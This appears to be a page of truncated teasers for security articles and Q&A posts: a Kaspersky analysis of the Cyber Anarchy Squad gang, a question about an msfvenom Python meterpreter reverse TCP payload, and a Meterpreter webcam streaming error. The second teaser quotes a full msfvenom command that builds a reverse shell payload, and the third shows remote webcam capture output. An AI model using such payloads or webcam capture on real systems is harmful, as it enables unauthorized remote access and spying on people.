Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations

Kaspersky experts analyze attacks by C.A.S, a cybergang that uses uncommon remote access Trojans and posts data about victims in public Telegram channels. Continue reading Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations

How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

I am generating a Python payload using msfvenom with the following command:
msfvenom -p python/meterpreter_reverse_tcp -f raw –platform python -e generic/none -a python LHOST= LPORT=9090 -o
The payload … Continue reading How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

Getting the error stdapi_webcam_start: Operation failed: 731 when trying to stream from my Logitech C920 webcam in Meterpreter

I’m trying to use the webcam_stream command in Meterpreter, and I receive the following error:
meterpreter > webcam_stream
[*] Starting…
[*] Preparing player…
[*] Opening player at: /home/kali/PlvufTqJ.html
[*] Streaming…
[-] stda… Continue reading Getting the error stdapi_webcam_start: Operation failed: 731 when trying to stream from my Logitech C920 webcam in Meterpreter